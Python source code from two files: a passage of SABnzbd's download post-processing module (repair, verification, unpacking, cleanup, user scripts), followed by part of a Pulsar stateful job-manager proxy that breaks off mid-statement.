[nzo for nzo in history_queue if os.path.exists(nzo.downpath)] except: logging.info('Corrupt %s file, discarding', POSTPROC_QUEUE_FILE_NAME) logging.info("Traceback: ", exc_info=True) def delete(self, nzo_id, del_files=False): """ Remove a job from the post processor queue """ for nzo in self.history_queue: if nzo.nzo_id == nzo_id: if nzo.status in (Status.FAILED, Status.COMPLETED): nzo.to_be_removed = True elif nzo.status in (Status.DOWNLOADING, Status.QUEUED): self.remove(nzo) nzo.purge_data(delete_all_data=del_files) logging.info('Removed job %s from postproc queue', nzo.final_name) nzo.work_name = '' # Mark as deleted job break def process(self, nzo): """ Push on finished job in the queue """ if nzo not in self.history_queue: self.history_queue.append(nzo) # Fast-track if it has DirectUnpacked jobs or if it's still going if nzo.direct_unpacker and (nzo.direct_unpacker.success_sets or not nzo.direct_unpacker.killed): self.fast_queue.put(nzo) else: self.slow_queue.put(nzo) self.save() sabnzbd.history_updated() def remove(self, nzo): """ Remove given nzo from the queue """ try: self.history_queue.remove(nzo) except: pass self.save() sabnzbd.history_updated() def stop(self): """ Stop thread after finishing running job """ self.__stop = True self.slow_queue.put(None) self.fast_queue.put(None) def cancel_pp(self, nzo_id): """ Change the status, so that the PP is canceled """ for nzo in self.history_queue: if nzo.nzo_id == nzo_id: nzo.abort_direct_unpacker() if nzo.pp_active: nzo.pp_active = False return True return None def empty(self): """ Return True if pp queue is empty """ return self.slow_queue.empty() and self.fast_queue.empty() and not self.__busy def get_queue(self): """ Return list of NZOs that still need to be processed """ return [nzo for nzo in self.history_queue if nzo.work_name] def get_path(self, nzo_id): """ Return download path for given nzo_id or None when not found """ for nzo in self.history_queue: if nzo.nzo_id == nzo_id: return nzo.downpath return None def run(self): """ Postprocessor loop """ # First we do a dircheck complete_dir = sabnzbd.cfg.complete_dir.get_path() if sabnzbd.utils.checkdir.isFAT(complete_dir): logging.warning(T('Completed Download Folder %s is on FAT file system, limiting maximum file size to 4GB') % complete_dir) else: logging.info("Completed Download Folder %s is not on FAT", complete_dir) # Start looping check_eoq = False while not self.__stop: self.__busy = False if self.paused: time.sleep(5) continue # Something in the fast queue? try: # Every few fast-jobs we should check allow a # slow job so that they don't wait forever if self.__fast_job_count >= MAX_FAST_JOB_COUNT and self.slow_queue.qsize(): raise queue.Empty nzo = self.fast_queue.get(timeout=2) self.__fast_job_count += 1 except queue.Empty: # Try the slow queue try: nzo = self.slow_queue.get(timeout=2) # Reset fast-counter self.__fast_job_count = 0 except queue.Empty: # Check for empty queue if check_eoq: check_eoq = False handle_empty_queue() # No fast or slow jobs, better luck next loop! continue # Stop job if not nzo: continue # Job was already deleted. if not nzo.work_name: check_eoq = True continue # Flag NZO as being processed nzo.pp_active = True # Pause downloader, if users wants that if cfg.pause_on_post_processing(): sabnzbd.downloader.Downloader.do.wait_for_postproc() self.__busy = True process_job(nzo) if nzo.to_be_removed: history_db = database.HistoryDB() history_db.remove_history(nzo.nzo_id) history_db.close() nzo.purge_data() # Processing done nzo.pp_active = False self.remove(nzo) check_eoq = True # Allow download to proceed sabnzbd.downloader.Downloader.do.resume_from_postproc() def process_job(nzo): """ Process one job """ start = time.time() # keep track of whether we can continue all_ok = True # keep track of par problems par_error = False # keep track of any unpacking errors unpack_error = False # Signal empty download, for when 'empty_postproc' is enabled empty = False nzb_list = [] # These need to be initialized in case of a crash workdir_complete = '' script_log = '' script_line = '' # Get the job flags nzo.save_attribs() flag_repair, flag_unpack, flag_delete = nzo.repair_opts # Normalize PP if flag_delete: flag_unpack = True if flag_unpack: flag_repair = True # Get the NZB name filename = nzo.final_name if nzo.fail_msg: # Special case: aborted due to too many missing data nzo.status = Status.FAILED nzo.save_attribs() all_ok = False par_error = True unpack_error = 1 try: # Get the folder containing the download result workdir = nzo.downpath tmp_workdir_complete = None # if no files are present (except __admin__), fail the job if all_ok and len(globber(workdir)) < 2: if nzo.precheck: _enough, ratio = nzo.check_availability_ratio() req_ratio = float(cfg.req_completion_rate()) / 100.0 # Make sure that rounded ratio doesn't equal required ratio # when it is actually below required if (ratio < req_ratio) and (req_ratio - ratio) < 0.001: ratio = req_ratio - 0.001 emsg = '%.1f%%' % (ratio * 100.0) emsg2 = '%.1f%%' % float(cfg.req_completion_rate()) emsg = T('Download might fail, only %s of required %s available') % (emsg, emsg2) else: emsg = T('Download failed - Not on your server(s)') empty = True emsg += ' - https://sabnzbd.org/not-complete' nzo.fail_msg = emsg nzo.set_unpack_info('Fail', emsg) nzo.status = Status.FAILED # do not run unpacking or parity verification flag_repair = flag_unpack = False all_ok = cfg.empty_postproc() and empty if not all_ok: par_error = True unpack_error = 1 script = nzo.script logging.info('Starting Post-Processing on %s' + ' => Repair:%s, Unpack:%s, Delete:%s, Script:%s, Cat:%s', filename, flag_repair, flag_unpack, flag_delete, script, nzo.cat) # Set complete dir to workdir in case we need to abort workdir_complete = workdir # Par processing, if enabled if all_ok and flag_repair: par_error, re_add = parring(nzo, workdir) if re_add: # Try to get more par files return False # If we don't need extra par2, we can disconnect if sabnzbd.nzbqueue.NzbQueue.do.actives(grabs=False) == 0 and cfg.autodisconnect(): # This was the last job, close server connections sabnzbd.downloader.Downloader.do.disconnect() # Sanitize the resulting files if sabnzbd.WIN32: sanitize_files_in_folder(workdir) # Check if user allows unsafe post-processing if flag_repair and cfg.safe_postproc(): all_ok = all_ok and not par_error if all_ok: # Fix encodings fix_unix_encoding(workdir) # Use dirs generated by direct-unpacker if nzo.direct_unpacker and nzo.direct_unpacker.unpack_dir_info: tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = nzo.direct_unpacker.unpack_dir_info else: # Generate extraction path tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file = prepare_extraction_path(nzo) newfiles = [] # Run Stage 2: Unpack if flag_unpack: # Set the current nzo status to "Extracting...". Used in History nzo.status = Status.EXTRACTING logging.info("Running unpack_magic on %s", filename) unpack_error, newfiles = unpack_magic(nzo, workdir, tmp_workdir_complete, flag_delete, one_folder, (), (), (), (), ()) logging.info("Unpacked files %s", newfiles) if sabnzbd.WIN32: # Sanitize the resulting files newfiles = sanitize_files_in_folder(tmp_workdir_complete) logging.info("Finished unpack_magic on %s", filename) if cfg.safe_postproc(): all_ok = all_ok and not unpack_error if all_ok: # Move any (left-over) files to destination nzo.status = Status.MOVING nzo.set_action_line(T('Moving'), '...') for root, _dirs, files in os.walk(workdir): if not root.endswith(JOB_ADMIN): for file_ in files: path = os.path.join(root, file_) new_path = path.replace(workdir, tmp_workdir_complete) ok, new_path = move_to_path(path, new_path) if new_path: newfiles.append(new_path) if not ok: nzo.set_unpack_info('Unpack', T('Failed moving %s to %s') % (path, new_path)) all_ok = False break # Set permissions right set_permissions(tmp_workdir_complete) if all_ok and marker_file: del_marker(os.path.join(tmp_workdir_complete, marker_file)) remove_from_list(marker_file, newfiles) if all_ok: # Remove files matching the cleanup list cleanup_list(tmp_workdir_complete, True) # Check if this is an NZB-only download, if so redirect to queue # except when PP was Download-only if flag_repair: nzb_list = nzb_redirect(tmp_workdir_complete, nzo.final_name, nzo.pp, script, nzo.cat, priority=nzo.priority) else: nzb_list = None if nzb_list: nzo.set_unpack_info('Download', T('Sent %s to queue') % nzb_list) cleanup_empty_directories(tmp_workdir_complete) else: cleanup_list(tmp_workdir_complete, False) script_output = '' script_ret = 0 if not nzb_list: # Give destination its final name if cfg.folder_rename() and tmp_workdir_complete and not one_folder: if all_ok: try: newfiles = rename_and_collapse_folder(tmp_workdir_complete, workdir_complete, newfiles) except: logging.error(T('Error renaming "%s" to "%s"'), clip_path(tmp_workdir_complete), clip_path(workdir_complete)) logging.info('Traceback: ', exc_info=True) # Better disable sorting because filenames are all off now file_sorter.sort_file = None else: workdir_complete = tmp_workdir_complete.replace('_UNPACK_', '_FAILED_') workdir_complete = get_unique_path(workdir_complete, n=0, create_dir=False) if empty: job_result = -1 else: job_result = int(par_error) + int(bool(unpack_error)) * 2 if cfg.ignore_samples(): remove_samples(workdir_complete) # TV/Movie/Date Renaming code part 2 - rename and move files to parent folder if all_ok and file_sorter.sort_file: if newfiles: file_sorter.rename(newfiles, workdir_complete) workdir_complete, ok = file_sorter.move(workdir_complete) else: workdir_complete, ok = file_sorter.rename_with_ext(workdir_complete) if not ok: nzo.set_unpack_info('Unpack', T('Failed to move files')) all_ok = False # Run the user script script_path = make_script_path(script) if (all_ok or not cfg.safe_postproc()) and (not nzb_list) and script_path: # Set the current nzo status to "Ext Script...". Used in History nzo.status = Status.RUNNING nzo.set_action_line(T('Running script'), script) nzo.set_unpack_info('Script', T('Running user script %s') % script, unique=True) script_log, script_ret = external_processing(script_path, nzo, clip_path(workdir_complete), nzo.final_name, job_result) script_line = get_last_line(script_log) if script_log: script_output = nzo.nzo_id if script_line: nzo.set_unpack_info('Script', script_line, unique=True) else: nzo.set_unpack_info('Script', T('Ran %s') % script, unique=True) else: script = "" script_line = "" script_ret = 0 # Maybe bad script result should fail job if script_ret and cfg.script_can_fail(): script_error = True all_ok = False nzo.fail_msg = T('Script exit code is %s') % script_ret else: script_error = False # Email the results if (not nzb_list) and cfg.email_endjob(): if (cfg.email_endjob() == 1) or (cfg.email_endjob() == 2 and (unpack_error or par_error or script_error)): emailer.endjob(nzo.final_name, nzo.cat, all_ok, workdir_complete, nzo.bytes_downloaded, nzo.fail_msg, nzo.unpack_info, script, script_log, script_ret) if script_output: # Can do this only now, otherwise it would show up in the email if script_ret: script_ret = 'Exit(%s) ' % script_ret else: script_ret = '' if len(script_log.rstrip().split('\n')) > 1: nzo.set_unpack_info('Script', '%s%s <a href="./scriptlog?name=%s">(%s)</a>' % (script_ret, script_line, xml.sax.saxutils.escape(script_output), T('More')), unique=True) else: # No '(more)' button needed nzo.set_unpack_info('Script', '%s%s ' % (script_ret, script_line), unique=True) # Cleanup again, including NZB files if all_ok: cleanup_list(workdir_complete, False) # Force error for empty result all_ok = all_ok and not empty # Update indexer with results if cfg.rating_enable(): if nzo.encrypted > 0: Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_ENCRYPTED) if empty: hosts = [s.host for s in sabnzbd.downloader.Downloader.do.nzo_servers(nzo)] if not hosts: hosts = [None] for host in hosts: Rating.do.update_auto_flag(nzo.nzo_id, Rating.FLAG_EXPIRED, host) except: logging.error(T('Post Processing Failed for %s (%s)'), filename, T('see logfile')) logging.info("Traceback: ", exc_info=True) nzo.fail_msg = T('PostProcessing was aborted (%s)') % T('see logfile') notifier.send_notification(T('Download Failed'), filename, 'failed', nzo.cat) nzo.status = Status.FAILED par_error = True all_ok = False if cfg.email_endjob(): emailer.endjob(nzo.final_name, nzo.cat, all_ok, clip_path(workdir_complete), nzo.bytes_downloaded, nzo.fail_msg, nzo.unpack_info, '', '', 0) if all_ok: # If the folder only contains one file OR folder, have that as the path # Be aware that series/generic/date sorting may move a single file into a folder containing other files workdir_complete = one_file_or_folder(workdir_complete) workdir_complete = os.path.normpath(workdir_complete) # Clean up the NZO data try: nzo.purge_data(delete_all_data=all_ok) except: logging.error(T('Cleanup of %s failed.'), nzo.final_name) logging.info("Traceback: ", exc_info=True) # Use automatic retry link on par2 errors and encrypted/bad RARs if par_error or unpack_error in (2, 3): try_alt_nzb(nzo) # Show final status in history if all_ok: notifier.send_notification(T('Download Completed'), filename, 'complete', nzo.cat) nzo.status = Status.COMPLETED else: notifier.send_notification(T('Download Failed'), filename, 'failed', nzo.cat) nzo.status = Status.FAILED # Log the overall time taken for postprocessing postproc_time = int(time.time() - start) # Create the history DB instance history_db = database.HistoryDB() # Add the nzo to the database. Only the path, script and time taken is passed # Other information is obtained from the nzo history_db.add_history_db(nzo, clip_path(workdir_complete), nzo.downpath, postproc_time, script_log, script_line) # Purge items history_db.auto_history_purge() # The connection is only used once, so close it here history_db.close() sabnzbd.history_updated() return True def prepare_extraction_path(nzo): """ Based on the information that we have, generate the extraction path and create the directory. Separated so it can be called from DirectUnpacker """ one_folder = False marker_file = None # Determine class directory catdir = config.get_categories(nzo.cat).dir() if catdir.endswith('*'): catdir = catdir.strip('*') one_folder = True complete_dir = real_path(cfg.complete_dir.get_path(), catdir) complete_dir = long_path(complete_dir) # TV/Movie/Date Renaming code part 1 - detect and construct paths if cfg.enable_meta(): file_sorter = Sorter(nzo, nzo.cat) else: file_sorter = Sorter(None, nzo.cat) complete_dir = file_sorter.detect(nzo.final_name, complete_dir) if file_sorter.sort_file: one_folder = False complete_dir = sanitize_and_trim_path(complete_dir) if one_folder: workdir_complete = create_all_dirs(complete_dir, umask=True) else: workdir_complete = get_unique_path(os.path.join(complete_dir, nzo.final_name), create_dir=True) marker_file = set_marker(workdir_complete) if not workdir_complete or not os.path.exists(workdir_complete): logging.error(T('Cannot create final folder %s') % os.path.join(complete_dir, nzo.final_name)) raise IOError if cfg.folder_rename() and not one_folder: prefixed_path = prefix(workdir_complete, '_UNPACK_') tmp_workdir_complete = get_unique_path(prefix(workdir_complete, '_UNPACK_'), create_dir=False) try: renamer(workdir_complete, tmp_workdir_complete) except: pass # On failure, just use the original name # Is the unique path different? Then we also need to modify the final path if prefixed_path != tmp_workdir_complete: workdir_complete = workdir_complete + os.path.splitext(tmp_workdir_complete)[1] else: tmp_workdir_complete = workdir_complete return tmp_workdir_complete, workdir_complete, file_sorter, one_folder, marker_file def parring(nzo, workdir): """ Perform par processing. Returns: (par_error, re_add) """ filename = nzo.final_name notifier.send_notification(T('Post-processing'), filename, 'pp', nzo.cat) logging.info('Starting verification and repair of %s', filename) # Get verification status of sets verified = sabnzbd.load_data(VERIFIED_FILE, nzo.workpath, remove=False) or {} repair_sets = list(nzo.extrapars.keys()) re_add = False par_error = False single = len(repair_sets) == 1 if repair_sets: for setname in repair_sets: if cfg.ignore_samples() and RE_SAMPLE.search(setname.lower()): continue if not verified.get(setname, False): logging.info("Running verification and repair on set %s", setname) parfile_nzf = nzo.partable[setname] # Check if file maybe wasn't deleted and if we maybe have more files in the parset if os.path.exists(os.path.join(nzo.downpath, parfile_nzf.filename)) or nzo.extrapars[setname]: need_re_add, res = par2_repair(parfile_nzf, nzo, workdir, setname, single=single) # Was it aborted? if not nzo.pp_active: re_add = False par_error = True break re_add = re_add or need_re_add verified[setname] = res else: continue par_error = par_error or not res else: # We must not have found any par2.. logging.info("No par2 sets for %s", filename) nzo.set_unpack_info('Repair', T('[%s] No par2 sets') % filename) if cfg.sfv_check() and not verified.get('', False): par_error = not try_sfv_check(nzo, workdir) verified[''] = not par_error # If still no success, do RAR-check or RAR-rename if not par_error and cfg.enable_unrar(): _, _, rars, _, _ = build_filelists(workdir) # If there's no RAR's, they might be super-obfuscated if not rars: # Returns number of renamed RAR's if rar_renamer(nzo, workdir): # Re-parse the files so we can do RAR-check _, _, rars, _, _ = build_filelists(workdir) if rars: par_error = not try_rar_check(nzo, rars) verified[''] = not par_error if re_add: logging.info('Re-added %s to queue', filename) if nzo.priority != TOP_PRIORITY: nzo.priority = REPAIR_PRIORITY nzo.status = Status.FETCHING sabnzbd.nzbqueue.NzbQueue.do.add(nzo) sabnzbd.downloader.Downloader.do.resume_from_postproc() sabnzbd.save_data(verified, VERIFIED_FILE, nzo.workpath) logging.info('Verification and repair finished for %s', filename) return par_error, re_add def try_sfv_check(nzo, workdir): """ Attempt to verify set using SFV file Return True if verified, False when failed """ # Get list of SFV names; shortest name first, minimizes the chance on a mismatch sfvs = globber_full(workdir, '*.sfv') sfvs.sort(key=lambda x: len(x)) par_error = False found = False for sfv in sfvs: found = True setname = setname_from_path(sfv) nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying SFV verification'), setname) nzo.set_action_line(T('Trying SFV verification'), '...') failed = sfv_check(sfv) if failed: fail_msg = T('Some files failed to verify against "%s"') % setname msg = fail_msg + '; ' msg += '; '.join(failed) nzo.set_unpack_info('Repair', msg, setname) par_error = True else: nzo.set_unpack_info('Repair', T('Verified successfully using SFV files'), setname) # Show error in GUI if found and par_error: nzo.status = Status.FAILED nzo.fail_msg = fail_msg return False # Success or just no SFV's return True def try_rar_check(nzo, rars): """ Attempt to verify set using the RARs Return True if verified, False when failed When setname is '', all RAR files will be used, otherwise only the matching one If no RAR's are found, returns True """ # Sort for better processing rars.sort(key=functools.cmp_to_key(rar_sort)) # Test if rars: setname = setname_from_path(rars[0]) nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying RAR-based verification'), setname) nzo.set_action_line(T('Trying RAR-based verification'), '...') try: # Set path to unrar and open the file # Requires de-unicode for RarFile to work! rarfile.UNRAR_TOOL = sabnzbd.newsunpack.RAR_COMMAND zf = rarfile.RarFile(rars[0]) # Skip if it's encrypted if zf.needs_password(): msg = T('[%s] RAR-based verification failed: %s') % (setname, T('Passworded')) nzo.set_unpack_info('Repair', msg) return True # Will throw exception if something is wrong zf.testrar() # Success! msg = T('RAR files verified successfully') nzo.set_unpack_info('Repair', msg, setname) logging.info(msg) return True except rarfile.Error as e: nzo.fail_msg = T('RAR files failed to verify') msg = T('[%s] RAR-based verification failed: %s') % (setname, e) nzo.set_unpack_info('Repair', msg, setname) logging.info(msg) return False else: # No rar-files, so just continue return True def rar_renamer(nzo, workdir): """ Try to use the the header information to give RAR-files decent names """ nzo.status = Status.VERIFYING nzo.set_unpack_info('Repair', T('Trying RAR-based verification')) nzo.set_action_line(T('Trying RAR-based verification'), '...') renamed_files = 0 workdir_files = recursive_listdir(workdir) for file_to_check in workdir_files: # The function will check if it's a RAR-file # We do a sanity-check for the returned number rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check) if 0 < rar_vol < 1000: logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check) new_rar_name = "%s.%s" % (nzo.final_name, new_extension) new_rar_name = os.path.join(workdir, new_rar_name) # Right now we don't support multiple sets inside the same NZB # So we have to make sure the name is unique new_rar_name = get_unique_filename(new_rar_name) renamer(file_to_check, new_rar_name) renamed_files += 1 else: logging.debug("No RAR-volume-number found in %s", file_to_check) return renamed_files def handle_empty_queue(): """ Check if empty queue calls for action """ if sabnzbd.nzbqueue.NzbQueue.do.actives() == 0: sabnzbd.save_state() notifier.send_notification("SABnzbd", T('Queue finished'), 'queue_done') # Perform end-of-queue action when one is set if sabnzbd.QUEUECOMPLETEACTION: logging.info("Queue has finished, launching: %s (%s)", sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG) if sabnzbd.QUEUECOMPLETEARG: sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG) else: Thread(target=sabnzbd.QUEUECOMPLETEACTION).start() sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False) def cleanup_list(wdir, skip_nzb): """ Remove all files whose extension matches the cleanup list, optionally ignoring the nzb extension """ if cfg.cleanup_list(): try: files = os.listdir(wdir) except: files = () for filename in files: path = os.path.join(wdir, filename) if os.path.isdir(path): cleanup_list(path, skip_nzb) else: if on_cleanup_list(filename, skip_nzb): try: logging.info("Removing unwanted file %s", path) remove_file(path) except: logging.error(T('Removing %s failed'), clip_path(path)) logging.info("Traceback: ", exc_info=True) if files: try: remove_dir(wdir) except: pass def prefix(path, pre): """ Apply prefix to last part of path '/my/path' and 'hi_' will give '/my/hi_path' """ p, d = os.path.split(path) return os.path.join(p, pre + d) def nzb_redirect(wdir, nzbname, pp, script, cat, priority): """ Check if this job contains only NZB files, if so send to queue and remove if on clean-up list Returns list of processed NZB's """ files = recursive_listdir(wdir) for file_ in files: if os.path.splitext(file_)[1].lower() != '.nzb': return None # For multiple NZBs, cannot use the current job name if len(files) != 1: nzbname = None # Process all NZB files for nzb_file in files: dirscanner.process_single_nzb(os.path.split(nzb_file)[1], file_, pp, script, cat, priority=priority, keep=False, dup_check=False, nzbname=nzbname) return files def one_file_or_folder(folder): """ If the dir only contains one file or folder, join that file/folder onto the path """ if os.path.exists(folder) and os.path.isdir(folder): try: cont = os.listdir(folder) if len(cont) == 1: folder = os.path.join(folder, cont[0]) folder = one_file_or_folder(folder) except WindowsError: # Can occur on paths it doesn't like, for example "C:" pass return folder TAG_RE = re.compile(r'<[^>]+>') def get_last_line(txt): """ Return last non-empty line of a text, trim to 150 max """ # First we remove HTML code in a basic way txt = TAG_RE.sub(' ', txt) # Then we get the last line lines = txt.split('\n') n = len(lines) - 1 while n >= 0 and not lines[n].strip('\r\t '): n = n - 1 line = lines[n].strip('\r\t ') if len(line) >= 150: line = line[:147] + '...' return line def remove_samples(path): """ Remove all files that match the sample pattern Skip deleting if it matches all files or there is only 1 file """ files_to_delete = [] nr_files = 0 for root, _dirs, files in os.walk(path): for file_to_match in files: nr_files += 1 if RE_SAMPLE.search(file_to_match): files_to_delete.append(os.path.join(root, file_to_match)) # Make sure we skip false-positives if len(files_to_delete) < nr_files: for path in files_to_delete: try: logging.info("Removing unwanted sample file %s", path) remove_file(path) except: logging.error(T('Removing %s failed'), clip_path(path)) logging.info("Traceback: ", exc_info=True) else: logging.info("Skipping sample-removal, false-positive") def rename_and_collapse_folder(oldpath, newpath, files): """ Rename folder, collapsing when there's just a single subfolder oldpath --> newpath OR oldpath/subfolder --> newpath Modify list of filenames accordingly """ orgpath = oldpath items = globber(oldpath) if len(items) == 1: folder = items[0] folder_path = os.path.join(oldpath, folder) if os.path.isdir(folder_path) and folder not in ('VIDEO_TS', 'AUDIO_TS'): logging.info('Collapsing %s', os.path.join(newpath, folder)) oldpath = folder_path oldpath = os.path.normpath(oldpath) newpath = os.path.normpath(newpath) files = [os.path.normpath(f).replace(oldpath, newpath) for f in files] renamer(oldpath, newpath) try: remove_dir(orgpath) except: pass return files def set_marker(folder): """ Set marker file and return name """ name = cfg.marker_file() if name: path = os.path.join(folder, name) logging.debug('Create marker file %s', path) try: fp = open(path, 'w') fp.close() except: logging.info('Cannot create marker file %s', path) logging.info("Traceback: ", exc_info=True) name = None return name def del_marker(path): """ Remove marker file """ if path and os.path.exists(path): logging.debug('Removing marker file %s', path) try: remove_file(path) except: logging.info('Cannot remove marker file %s', path) logging.info("Traceback: ", exc_info=True) def remove_from_list(name, lst): if name: for n in range(len(lst)): if lst[n].endswith(name): logging.debug('Popping %s', lst[n]) lst.pop(n) return def try_alt_nzb(nzo): """ Try to get a new NZB if available """ url = nzo.nzo_info.get('failure') if url and cfg.new_nzb_on_failure(): sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
stateful.py
from __future__ import division import contextlib import datetime import os import time import threading from galaxy.tools.deps import dependencies from pulsar.client.util import filter_destination_params from pulsar.managers import ManagerProxy from pulsar.managers import status from pulsar.managers.util.retry import RetryActionExecutor from .staging import preprocess from .staging import postprocess import logging log = logging.getLogger(__name__) DEFAULT_DO_MONITOR = False DECACTIVATE_FAILED_MESSAGE = "Failed to deactivate job with job id %s. May cause problems on next Pulsar start." ACTIVATE_FAILED_MESSAGE = "Failed to activate job with job id %s. This job may not recover properly upon Pulsar restart." JOB_FILE_FINAL_STATUS = "final_status" JOB_FILE_POSTPROCESSED = "postprocessed" JOB_FILE_PREPROCESSED = "preprocessed" JOB_FILE_PREPROCESSING_FAILED = "preprocessing_failed" JOB_METADATA_RUNNING = "running" ACTIVE_STATUS_PREPROCESSING = "preprocessing" ACTIVE_STATUS_LAUNCHED = "launched" DEFAULT_MIN_POLLING_INTERVAL = 0.5 class StatefulManagerProxy(ManagerProxy): """ """ def __init__(self, manager, **manager_options): super(StatefulManagerProxy, self).__init__(manager) min_polling_interval = float(manager_options.get("min_polling_interval", DEFAULT_MIN_POLLING_INTERVAL)) preprocess_retry_action_kwds = filter_destination_params(manager_options, "preprocess_action_") postprocess_retry_action_kwds = filter_destination_params(manager_options, "postprocess_action_") self.__preprocess_action_executor = RetryActionExecutor(**preprocess_retry_action_kwds) self.__postprocess_action_executor = RetryActionExecutor(**postprocess_retry_action_kwds) self.min_polling_interval = datetime.timedelta(0, min_polling_interval) self.active_jobs = ActiveJobs.from_manager(manager) self.__state_change_callback = self._default_status_change_callback self.__monitor = None def set_state_change_callback(self, state_change_callback): self.__state_change_callback = state_change_callback self.__monitor = ManagerMonitor(self) def _default_status_change_callback(self, status, job_id): log.info("Status of job [%s] changed to [%s]. No callbacks enabled." % (job_id, status)) @property def name(self): return self._proxied_manager.name def setup_job(self, *args, **kwargs): job_id = self._proxied_manager.setup_job(*args, **kwargs) return job_id def _persist_launch_config(self, job_id, launch_config): job_directory = self._proxied_manager.job_directory(job_id) job_directory.store_metadata("launch_config", launch_config) def touch_outputs(self, job_id, touch_outputs): job_directory = self._proxied_manager.job_directory(job_id) for name in touch_outputs: path = job_directory.calculate_path(name, 'output') job_directory.open_file(path, mode='a') def preprocess_and_launch(self, job_id, launch_config): self._persist_launch_config(job_id, launch_config) requires_preprocessing = launch_config.get("remote_staging") and launch_config["remote_staging"].get("setup") if requires_preprocessing: self.active_jobs.activate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING) self._launch_prepreprocessing_thread(job_id, launch_config) else: with self._handling_of_preprocessing_state(job_id, launch_config): pass def _launch_prepreprocessing_thread(self, job_id, launch_config): def do_preprocess(): with self._handling_of_preprocessing_state(job_id, launch_config): job_directory = self._proxied_manager.job_directory(job_id) staging_config = launch_config.get("remote_staging", {}) # TODO: swap out for a generic "job_extra_params" if 'action_mapper' in staging_config and \ 'ssh_key' in staging_config['action_mapper'] and \ 'setup' in staging_config: for action in staging_config['setup']: action['action'].update(ssh_key=staging_config['action_mapper']['ssh_key']) preprocess(job_directory, staging_config.get("setup", []), self.__preprocess_action_executor) self.active_jobs.deactivate_job(job_id, active_status=ACTIVE_STATUS_PREPROCESSING) new_thread_for_job(self, "preprocess", job_id, do_preprocess, daemon=False) @contextlib.contextmanager def _handling_of_preprocessing_state(self, job_id, launch_config): job_directory = self._proxied_manager.job_directory(job_id) try: yield launch_kwds = {} if launch_config.get("dependencies_description"): dependencies_description = dependencies.DependenciesDescription.from_dict(launch_config["dependencies_description"]) launch_kwds["dependencies_description"] = dependencies_description for kwd in ["submit_params", "setup_params", "env"]: if kwd in launch_config: launch_kwds[kwd] = launch_config[kwd] self._proxied_manager.launch( job_id, launch_config["command_line"], **launch_kwds ) with job_directory.lock("status"): job_directory.store_metadata(JOB_FILE_PREPROCESSED, True) self.active_jobs.activate_job(job_id) except Exception as e: with job_directory.lock("status"): job_directory.store_metadata(JOB_FILE_PREPROCESSING_FAILED, True) job_directory.store_metadata("return_code", 1) job_directory.write_file("stderr", str(e)) self.__state_change_callback(status.FAILED, job_id) log.exception("Failed job preprocessing for job %s:", job_id) def handle_failure_before_launch(self, job_id): self.__state_change_callback(status.FAILED, job_id) def get_status(self, job_id): """ Compute status used proxied manager and handle state transitions and track additional state information needed. """ job_directory = self._proxied_manager.job_directory(job_id) with job_directory.lock("status"): proxy_status, state_change = self.__proxy_status(job_directory, job_id) if state_change == "to_complete": self.__deactivate(job_id, proxy_status) elif state_change == "to_running": self.__state_change_callback(status.RUNNING, job_id) return self.__status(job_directory, proxy_status) def __proxy_status(self, job_directory, job_id): """ Determine state with proxied job manager and if this job needs to be marked as deactivated (this occurs when job first returns a complete status from proxy. """ state_change = None if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED): proxy_status = status.FAILED job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status) state_change = "to_complete" elif not job_directory.has_metadata(JOB_FILE_PREPROCESSED): proxy_status = status.PREPROCESSING elif job_directory.has_metadata(JOB_FILE_FINAL_STATUS): proxy_status = job_directory.load_metadata(JOB_FILE_FINAL_STATUS) else: proxy_status = self._proxied_manager.get_status(job_id) if proxy_status == status.RUNNING: if not job_directory.has_metadata(JOB_METADATA_RUNNING): job_directory.store_metadata(JOB_METADATA_RUNNING, True) state_change = "to_running" elif proxy_status in [status.COMPLETE, status.CANCELLED]: job_directory.store_metadata(JOB_FILE_FINAL_STATUS, proxy_status) state_change = "to_complete" return proxy_status, state_change def __status(self, job_directory, proxy_status): """ Use proxied manager's status to compute the real (stateful) status of job. """ if proxy_status == status.COMPLETE: if not job_directory.has_metadata(JOB_FILE_POSTPROCESSED): job_status = status.POSTPROCESSING else: job_status = status.COMPLETE else: job_status = proxy_status return job_status def __deactivate(self, job_id, proxy_status): self.active_jobs.deactivate_job(job_id) deactivate_method = getattr(self._proxied_manager, "_deactivate_job", None) if deactivate_method: try: deactivate_method(job_id) except Exception: log.exception("Failed to deactivate via proxied manager job %s" % job_id) if proxy_status == status.COMPLETE: self.__handle_postprocessing(job_id) def __handle_postprocessing(self, job_id): def do_postprocess(): postprocess_success = False job_directory = self._proxied_manager.job_directory(job_id) try: postprocess_success = postprocess(job_directory, self.__postprocess_action_executor) except Exception: log.exception("Failed to postprocess results for job id %s" % job_id) final_status = status.COMPLETE if postprocess_success else status.FAILED if job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED): final_status = status.FAILED self.__state_change_callback(final_status, job_id) new_thread_for_job(self, "postprocess", job_id, do_postprocess, daemon=False) def shutdown(self, timeout=None): if self.__monitor: try: self.__monitor.shutdown(timeout) except Exception: log.exception("Failed to shutdown job monitor for manager %s" % self.name) super(StatefulManagerProxy, self).shutdown(timeout) def recover_active_jobs(self): unqueue_preprocessing_ids = [] for job_id in self.active_jobs.active_job_ids(active_status=ACTIVE_STATUS_PREPROCESSING): job_directory = self._proxied_manager.job_directory(job_id) if not job_directory.has_metadata("launch_config"): log.warn("Failed to find launch parameters for job scheduled to prepreprocess [%s]" % job_id) unqueue_preprocessing_ids.append(job_id) elif job_directory.has_metadata(JOB_FILE_PREPROCESSED): log.warn("Job scheduled to prepreprocess [%s] already preprocessed, skipping" % job_id) unqueue_preprocessing_ids.append(job_id) elif job_directory.has_metadata(JOB_FILE_PREPROCESSING_FAILED): log.warn("Job scheduled to prepreprocess [%s] previously failed 